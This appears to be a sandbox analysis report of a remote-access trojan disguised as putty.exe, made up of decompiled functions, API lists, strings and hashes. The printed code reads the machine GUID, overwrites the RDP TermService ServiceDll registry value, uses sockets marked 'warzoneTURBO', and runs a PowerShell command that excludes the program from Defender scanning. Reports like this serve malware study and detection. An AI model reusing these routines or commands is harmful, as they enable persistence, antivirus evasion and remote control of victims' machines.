                                  • Opcode ID: 9d65ee8b535991cc2c83cc34afe86964b00005fc8ac1bd73bdc2cdf835250f44
                                  • Instruction ID: feb65e06b3125344950c2ecfb6ecdf7295e9879baf5c0db247f31f74b0556ec4
                                  • Opcode Fuzzy Hash: 9d65ee8b535991cc2c83cc34afe86964b00005fc8ac1bd73bdc2cdf835250f44
                                  • Instruction Fuzzy Hash: 04011231004641EBE734AF11EC89AEA7BB2BF54315F504A3EF097515E2CBB969C9CA44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004111D7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E004111D7(intOrPtr* __ecx, void* __edx) {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				int* _t18;
				void* _t48;
				int* _t50;

				_t48 = __edx;
				_t35 = __ecx;
				_t50 = __ecx;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if( *0x55ad8c != 0) {
					_t18 = 0x55ad88;
				} else {
					RegOpenKeyExW(0x80000002,  *(E004036F7( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
					asm("sbb esi, esi");
					E00405FEB(_v12);
					if(1 != 0) {
						E00412569(_t48, E004036F7( &_v12, L"MachineGuid"),  &_v24);
						E00405FEB(_v12);
						E00412554( &_v8);
					}
					E00402FCE(_t50, E004061C0( &_v16,  &_v24));
					E00403148( &_v16);
					_t35 = 0x55ad88;
					_t18 = _t50;
				}
				E00402FCE(_t35, _t18);
				E00403148( &_v24);
				E00412554( &_v8);
				return _t50;
			}











                                  0x004111d7
                                  0x004111d7
                                  0x004111e1
                                  0x004111e3
                                  0x004111e6
                                  0x004111e9
                                  0x004111ec
                                  0x004111ee
                                  0x004111f7
                                  0x00411280
                                  0x004111fd
                                  0x0041121b
                                  0x00411226
                                  0x00411228
                                  0x00411230
                                  0x00411247
                                  0x0041124f
                                  0x00411257
                                  0x00411257
                                  0x0041126a
                                  0x00411272
                                  0x00411277
                                  0x0041127c
                                  0x0041127c
                                  0x00411286
                                  0x0041128e
                                  0x00411296
                                  0x004112a0

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                  • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                  • API String ID: 1903904756-1211650757
                                  • Opcode ID: 0c82c9a53f3f990eb4086e73eb5f784c8d770a9f7970ecd65c7419a389387ce6
                                  • Instruction ID: abda254be5c657bc903fa0ced37de60f06049733804472e9a7e1bd392f4ec8b1
                                  • Opcode Fuzzy Hash: 0c82c9a53f3f990eb4086e73eb5f784c8d770a9f7970ecd65c7419a389387ce6
                                  • Instruction Fuzzy Hash: 40115C30A0011AAACB04EF95C9628EEBB79AF54745B50016FF401B31D1DBB85F49DBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DCBF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040DCBF(void* __edx) {
				void* _v8;
				void* _v12;
				short* _v16;
				int _v20;
				char _v24;
				void* _t28;
				void* _t46;
				int _t48;

				_t46 = __edx;
				_v8 = 0;
				E004036F7( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v24 = 0;
				_v20 = 0;
				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
					L3:
					_t48 = 0;
				} else {
					_t28 = E00412569(_t46, E004036F7( &_v12, L"ServiceDll"),  &_v24);
					E00405FEB(_v12);
					if(_t28 != 0) {
						_t48 = E0040335A(E0040300A( &_v24,  &_v12), 0x55ad4c);
						E00405FEB(_v12);
						_v12 = 0;
					} else {
						E00412554( &_v8);
						goto L3;
					}
				}
				E00403148( &_v24);
				E00405FEB(_v16);
				E00412554( &_v8);
				return _t48;
			}











                                  0x0040dcbf
                                  0x0040dcd1
                                  0x0040dcd4
                                  0x0040dcdc
                                  0x0040dce9
                                  0x0040dcf9
                                  0x0040dd2b
                                  0x0040dd2b
                                  0x0040dcfb
                                  0x0040dd10
                                  0x0040dd1a
                                  0x0040dd21
                                  0x0040dd66
                                  0x0040dd68
                                  0x0040dd6d
                                  0x0040dd23
                                  0x0040dd26
                                  0x00000000
                                  0x0040dd26
                                  0x0040dd21
                                  0x0040dd30
                                  0x0040dd38
                                  0x0040dd40
                                  0x0040dd4a

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DCCC
                                  • ServiceDll, xrefs: 0040DCFF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                  • API String ID: 1903904756-387424650
                                  • Opcode ID: 7ab0eea5afd062f5f65387bf4bcc203051eea5cec69280cb6f9a26493aa2497a
                                  • Instruction ID: 01bca762208379d142ed9eb01ac329b8ace23437b38cc5e4ab4ac662769df0df
                                  • Opcode Fuzzy Hash: 7ab0eea5afd062f5f65387bf4bcc203051eea5cec69280cb6f9a26493aa2497a
                                  • Instruction Fuzzy Hash: EB114C71D00209BACB14EFA2C9928EEBB78EE50705F10016AE801B72C1DB785F05CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D856, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D856(void* __ecx, void* __edx) {
				void* _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char _v28;
				char _v36;
				void* _t26;
				void* _t28;
				void* _t43;
				int _t44;
				void* _t45;

				_t43 = __edx;
				_t45 = __ecx;
				_t44 = 0;
				_v12 = 0;
				E004036F7( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v28 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
					_t26 = E00403333(_t45 + 0x34, _t43,  &_v36);
					_t28 = E004125DF( &_v12, E004036F7( &_v16, L"ServiceDll"), _t26, 2);
					E00405FEB(_v16);
					_v16 = 0;
					E00403148( &_v36);
					E00412554( &_v12);
					if(_t28 != 0) {
						_t44 = 1;
					}
				}
				E00403148( &_v28);
				E00405FEB(_v20);
				E00412554( &_v12);
				return _t44;
			}














                                  0x0040d856
                                  0x0040d85e
                                  0x0040d860
                                  0x0040d86a
                                  0x0040d86d
                                  0x0040d875
                                  0x0040d882
                                  0x0040d892
                                  0x0040d89d
                                  0x0040d8b4
                                  0x0040d8be
                                  0x0040d8c6
                                  0x0040d8c9
                                  0x0040d8d1
                                  0x0040d8d8
                                  0x0040d8da
                                  0x0040d8da
                                  0x0040d8d8
                                  0x0040d8de
                                  0x0040d8e6
                                  0x0040d8ee
                                  0x0040d8f8

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                    • Part of subcall function 004125DF: RegSetValueExW.KERNEL32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040D862
                                  • ServiceDll, xrefs: 0040D8A3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                  • API String ID: 2854241163-387424650
                                  • Opcode ID: ba8d4023aa76601c343723c15223fb17b564002561b68f10df811a01d0a3b275
                                  • Instruction ID: f4c174c2a9310d4c42edb30c9c3d52768df1180ce11ea76c469564d993fc98ad
                                  • Opcode Fuzzy Hash: ba8d4023aa76601c343723c15223fb17b564002561b68f10df811a01d0a3b275
                                  • Instruction Fuzzy Hash: C2111C75D00219ABCB14EF92CC96DEFBB79EF94704F40406EE812B22D1DB785A45CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412569, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00412569(void* __edx, short** _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				void* __ecx;
				void* _t14;
				short** _t23;
				void** _t25;
				void** _t32;
				char* _t36;

				_push(_t25);
				_push(_t25);
				_t23 = _a4;
				_t32 = _t25;
				_v8 = 0;
				_v12 = 0;
				if(RegQueryValueExW( *_t32,  *_t23, 0,  &_v12, 0,  &_v8) != 0) {
					L5:
					_t14 = 0;
				} else {
					_t36 = E00401085(_v8);
					if(RegQueryValueExW( *_t32,  *_t23, 0,  &_v12, _t36,  &_v8) != 0) {
						goto L5;
					} else {
						E004030CC(_a8, _t36, _v8);
						if(_t36 != 0) {
							E00401099(_t36);
						}
						_t14 = 1;
					}
				}
				return _t14;
			}











                                  0x0041256c
                                  0x0041256d
                                  0x0041256f
                                  0x00412578
                                  0x00412584
                                  0x00412589
                                  0x00412594
                                  0x004125d6
                                  0x004125d6
                                  0x00412596
                                  0x0041259f
                                  0x004125b8
                                  0x00000000
                                  0x004125ba
                                  0x004125c1
                                  0x004125c8
                                  0x004125cb
                                  0x004125d0
                                  0x004125d3
                                  0x004125d3
                                  0x004125b8
                                  0x004125dc

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$ProcessQueryValue$AllocateFree
                                  • String ID: ?VA
                                  • API String ID: 3459632794-1028452459
                                  • Opcode ID: 0b292bdef0829f50d569de129b07e1f12dd45be3c1f1d3bd40aaa1ef304ff4b6
                                  • Instruction ID: ef5b91e0520f3c1ad74f83bd351b8b7f17400620d7ac54be9350e6622f7c98ba
                                  • Opcode Fuzzy Hash: 0b292bdef0829f50d569de129b07e1f12dd45be3c1f1d3bd40aaa1ef304ff4b6
                                  • Instruction Fuzzy Hash: E7019E72900118BFEB15DFA1DD85DEF7BBDEF08354B10007AF901E2250EA749F959AA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414F7E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00414F7E(void* __ecx, void* __eflags) {
				CHAR* _t21;
				CHAR* _t22;

				_t22 = E00401085(0x100);
				_t21 = E00401085(0x100);
				E00401052(_t22, 0, 0x100);
				E00401052(_t21, 0, 0x100);
				GetModuleFileNameA(0, _t22, 0x100);
				E0040102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E00401133("powershell Add-MpPreference -ExclusionPath "));
				_t1 =  &(_t21[0x2b]); // 0x2b
				E0040102C(_t1, _t22, 3);
				_t2 =  &(_t22[0xff]); // 0xff
				E0040102C(E00401133(_t21) + _t21, _t2, 1);
				return WinExec(_t21, 0);
			}





                                  0x00414f8d
                                  0x00414f98
                                  0x00414f9a
                                  0x00414fa3
                                  0x00414faf
                                  0x00414fc3
                                  0x00414fca
                                  0x00414fcf
                                  0x00414fd7
                                  0x00414fea
                                  0x00414ffe

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,74A313FB,00000000,004156DE), ref: 00414FAF
                                  • WinExec.KERNEL32 ref: 00414FF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateExecFileModuleNameProcess
                                  • String ID: powershell Add-MpPreference -ExclusionPath
                                  • API String ID: 1183730998-2194938034
                                  • Opcode ID: 0fce4c3b90f01b99dc6074e159970c8f1f4ae8f7f4535012ad248e759a026d52
                                  • Instruction ID: f9242cdbd1c9b696a892a29a9369df0dc44288307f8c57903ac4db52bc2fe90b
                                  • Opcode Fuzzy Hash: 0fce4c3b90f01b99dc6074e159970c8f1f4ae8f7f4535012ad248e759a026d52
                                  • Instruction Fuzzy Hash: E7F062B154025476F22032725CCBFBF566CDF89758F04043BF684B55D2EA7C994141BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004056F5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004056F5(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v24;
				void* _t21;
				void* _t38;
				intOrPtr _t39;
				void* _t40;

				_t37 = __edx;
				_t38 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {
					E00403115( &_v24, __edx, E004034D1( &_v12, "warzoneTURBO"));
					_t31 = _v12;
					E00405FEB(_v12);
					_t39 = _a4;
					_t32 = _t40;
					E0040315E(_t40, _t39);
					E0040315E(_t40,  &_v24);
					_t7 =  &_v16; // 0x405062
					_t21 = E004061F0(_t7, _t37, _t40, _t32, _v12, _t31);
					_t9 =  &_v16; // 0x405062
					_t10 = _t38 + 0xc; // 0x415e66
					__imp__#19( *_t10,  *_t9,  *((intOrPtr*)(_t39 + 4)), 0);
					E00403148( &_v16);
					E00403148( &_v24);
					return 0 | _t21 != 0xffffffff;
				}
				return 0;
			}










                                  0x004056f5
                                  0x004056fe
                                  0x00405704
                                  0x0040571b
                                  0x00405720
                                  0x00405723
                                  0x00405728
                                  0x0040572d
                                  0x00405730
                                  0x0040573d
                                  0x00405742
                                  0x00405745
                                  0x00405752
                                  0x00405755
                                  0x00405758
                                  0x00405769
                                  0x00405771
                                  0x00000000
                                  0x00405776
                                  0x00000000

                                  APIs
                                  • send.WS2_32(00415E66,bP@,?,00000000), ref: 00405758
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID: bP@$warzoneTURBO
                                  • API String ID: 2809346765-1210837753
                                  • Opcode ID: e0b2bafd42701770b9a29c098a03a9d52679123bf580f55750e91a4828fe6913
                                  • Instruction ID: f3416621e5f2c5c02f3395680495e6a6f54d57ba278d3546227d2c899631d6b7
                                  • Opcode Fuzzy Hash: e0b2bafd42701770b9a29c098a03a9d52679123bf580f55750e91a4828fe6913
                                  • Instruction Fuzzy Hash: 4A01C431900009BBCB04BFA6DC42CEEBB68DF14325B10423EF122761D1DB396B058A68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041068D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0041068D(intOrPtr* _a4) {
				intOrPtr* _t3;
				void* _t4;
				void* _t5;
				intOrPtr _t7;
				intOrPtr _t11;
				void* _t15;

				_t3 = _a4;
				_t7 =  *_t3;
				_t11 =  *((intOrPtr*)(_t3 + 8));
				if( *0x426755 != 0) {
					while(1) {
						_t4 = E00401085(0x2000);
						_t13 = _t4;
						__imp__#16(_t11, _t4, 0x1f40, 0);
						if(_t4 == 0xffffffff || _t4 == 0) {
							break;
						}
						E004106F9(_t13, _t4, _t7);
						_t5 = E00401099(_t13);
						_t15 = _t15 + 0xc;
						if( *0x426755 != 0) {
							continue;
						}
						L7:
						return _t5;
					}
					__imp__#3(_t11);
					_t5 = E00401099(_t13);
					goto L7;
				}
				return _t3;
			}









                                  0x00410697
                                  0x0041069c
                                  0x0041069e
                                  0x004106a1
                                  0x004106a4
                                  0x004106a9
                                  0x004106b6
                                  0x004106ba
                                  0x004106c3
                                  0x00000000
                                  0x00000000
                                  0x004106cd
                                  0x004106d3
                                  0x004106d8
                                  0x004106e2
                                  0x00000000
                                  0x00000000
                                  0x004106f4
                                  0x00000000
                                  0x004106f4
                                  0x004106e7
                                  0x004106ee
                                  0x00000000
                                  0x004106f3
                                  0x004106f8

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • recv.WS2_32(?,00000000,00001F40,00000000), ref: 004106BA
                                  • closesocket.WS2_32(?), ref: 004106E7
                                    • Part of subcall function 004106F9: send.WS2_32(?,00000000,00000002,00000000), ref: 0041074A
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateFreeclosesocketrecvsend
                                  • String ID: <5Ik
                                  • API String ID: 1908950363-1120072674
                                  • Opcode ID: 21b88c655a3f90420948bd08a6e993c7b1e70d5893b0c84512869bef3746b2a7
                                  • Instruction ID: cf5c065e532922d4a3d76e571e2bf2fb24ffb7083d1690fd6d685bf59492f6b1
                                  • Opcode Fuzzy Hash: 21b88c655a3f90420948bd08a6e993c7b1e70d5893b0c84512869bef3746b2a7
                                  • Instruction Fuzzy Hash: 85F09C716042442EE22063256C4AFFF379CCFC57ACF14016BFA04561E1DAF85CD282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004056D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketshutdown
                                  • String ID: <5Ik
                                  • API String ID: 572888783-1120072674
                                  • Opcode ID: 18556ba7e844cce46ebd37ac9a9e97582c4fa6a7267480bb493a8cf1ab882a1f
                                  • Instruction ID: 284792fdbf7bd6b26f007be0ad5fa8b9be9590e38c7f66b8807de1f76de5a812
                                  • Opcode Fuzzy Hash: 18556ba7e844cce46ebd37ac9a9e97582c4fa6a7267480bb493a8cf1ab882a1f
                                  • Instruction Fuzzy Hash: 6FD0C931018B109FD7311B14ED0EF92BBB1AB00332F10C65DE8BA444F0C7A06850DF84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ECE1, Relevance: 5.1, APIs: 4, Instructions: 77memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040ECE1(void** __ecx, void** __edx, void* __eflags) {
				void** _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				char _v100;
				void* _t35;
				void* _t38;
				void* _t62;

				_v8 = __edx;
				_t62 = 0;
				_v16 =  &_v100;
				_v24 = 0;
				_v12 = 0x426970;
				_v20 = 0x426970;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				if(E0040EE24( &_v16, __ecx, 0x40) != 0 && _v100 == 0x5a4d) {
					_v32 =  *((intOrPtr*)(__ecx)) + _v40;
					_t35 = LocalAlloc(0x40, 0x18);
					_v16 = _t35;
					if(_t35 != 0) {
						E0040EE24( &_v16,  &_v32, 0x18);
						_t44 =  ==  ? 0xf8 : 0x108;
						_t38 = LocalAlloc(0x40,  ==  ? 0xf8 : 0x108);
						_v24 = _t38;
						if(_t38 != 0) {
							_t62 = E0040EE24( &_v24,  &_v32, _t44);
							if(_t62 == 0) {
								LocalFree(_v24);
							} else {
								 *_v8 = _v24;
							}
						}
						LocalFree(_v16);
					}
				}
				return _t62;
			}















                                  0x0040ecec
                                  0x0040ecf2
                                  0x0040ecf4
                                  0x0040ecff
                                  0x0040ed02
                                  0x0040ed07
                                  0x0040ed0f
                                  0x0040ed1a
                                  0x0040ed3a
                                  0x0040ed3d
                                  0x0040ed3f
                                  0x0040ed44
                                  0x0040ed4e
                                  0x0040ed66
                                  0x0040ed6c
                                  0x0040ed74
                                  0x0040ed79
                                  0x0040ed87
                                  0x0040ed8c
                                  0x0040ed9b
                                  0x0040ed8e
                                  0x0040ed94
                                  0x0040ed94
                                  0x0040ed8c
                                  0x0040eda0
                                  0x0040eda0
                                  0x0040ed44
                                  0x0040eda8

                                  APIs
                                    • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                    • Part of subcall function 0040EE24: WriteFile.KERNEL32(?,`@,00426970,00000150,00000000), ref: 0040EE92
                                  • LocalAlloc.KERNEL32(00000040,00000018,00000001,?,0040EAD8), ref: 0040ED3D
                                    • Part of subcall function 0040EE24: WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                    • Part of subcall function 0040EE24: LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                    • Part of subcall function 0040EE24: LocalFree.KERNEL32(?), ref: 0040EEF6
                                  • LocalAlloc.KERNEL32(00000040,00000108), ref: 0040ED6C
                                  • LocalFree.KERNEL32(00000000), ref: 0040EDA0
                                    • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                    • Part of subcall function 0040EE24: ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                    • Part of subcall function 0040EE24: ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                  • LocalFree.KERNEL32(?), ref: 0040ED9B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Local$File$AllocFree$MemoryPointerProcessReadWrite
                                  • String ID:
                                  • API String ID: 2785045919-0
                                  • Opcode ID: 22fa37b712431e4a8c17cca72e3668fb64202397e257683892f01d797e81ccf6
                                  • Instruction ID: 844012893b931533083f36e29c55c77bc0a60c617dbdfc6ad0899e7f9f39f4eb
                                  • Opcode Fuzzy Hash: 22fa37b712431e4a8c17cca72e3668fb64202397e257683892f01d797e81ccf6
                                  • Instruction Fuzzy Hash: 32213B71E0020E9BCB10DFAAC9419DEF7B5EF84700F15846BE500BB290EB78AE01CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: putty.exe PID: 2428 Parent PID: 2948 putty.exeCOMMON

                                  Executed Functions

                                  Function 004154EB, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191registrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E004154EB(void* __eflags) {
				char _v592;
				char _v608;
				char _v1120;
				short _v1140;
				char _v1372;
				intOrPtr _v1492;
				char _v1496;
				char _v1508;
				char _v1512;
				char _v1528;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1560;
				intOrPtr _v1568;
				intOrPtr _v1584;
				intOrPtr _v1592;
				char _v1596;
				char _v1600;
				intOrPtr _v1604;
				int _v1608;
				char _v1616;
				char _v1620;
				char _v1624;
				void* _v1628;
				char _v1632;
				char _v1636;
				char _v1648;
				void* __edi;
				void* _t57;
				void* _t100;
				void* _t103;
				CHAR* _t116;
				char* _t123;
				CHAR* _t129;
				void* _t133;

				_v1616 = 0xa;
				_v1608 = 0;
				E00405D37( &_v1596);
				E00412C11( &_v1508);
				E004010AD(GetTickCount());
				_v1648 = 0x104;
				GetModuleFileNameA(0,  &_v1372, _t129);
				_v1624 = 0;
				_t57 = E004134A2( &_v1372,  &_v1624); // executed
				_t128 = _v1624;
				if(_v1624 == 0) {
					L22:
					E0041267D( &_v1508);
					E00405D5C( &_v1596, _t129);
					return 0;
				} else {
					_v1620 = 0;
					E00413279(_t57, _t128, 0x215a,  &_v1620);
					_t133 = 0x20;
					_t129 = E00401085(_t133);
					_t116 = _t129;
					do {
						 *_t116 = 0;
						_t116 =  &(_t116[1]);
						_t133 = _t133 - 1;
					} while (_t133 != 0);
					E0040102C(_t129,  &_v1620, 4);
					 *0x559cb0 = CreateEventA(0, 0, 0, _t129);
					if(GetLastError() == 0xb7) {
						goto L22;
					}
					_t145 =  *0x559cb0;
					if( *0x559cb0 == 0) {
						goto L22;
					}
